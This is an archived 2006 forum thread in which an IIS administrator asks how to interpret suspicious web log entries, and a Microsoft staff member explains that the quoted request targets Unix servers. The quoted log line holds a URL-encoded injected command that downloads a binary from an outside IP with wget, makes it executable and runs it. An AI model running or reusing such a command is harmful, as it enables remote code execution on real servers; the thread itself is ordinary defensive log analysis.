Psst! Did you know DevelopmentNow is a mobile web site design agency?

Contact us for help mobilizing your site, or to sign up for our beta Mobile Web SDK!
all groups > iis security > march 2006 >

iis security : Understanding W3SVC1 logs


Vic
3/17/2006 12:25:26 PM
Could anyone point me in the direction of a knowledge base or good book that
will help in understanding suspicious looking entries in the logs? I use iis
5, fully patched, anti-virus installed, updated daily and scanned daily.

For example, GET /webcalendar/tools/send_reminders.php

cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo

Thanks!
David Wang [Msft]
3/17/2006 1:00:47 PM
The request looks like a command sequence against a *nix server that has no
meaning on IIS/Windows.

--
//David
IIS
http://blogs.msdn.com/David.Wang
This posting is provided "AS IS" with no warranties, and confers no rights.
//

[quoted text, click to view]

AddThis Social Bookmark Button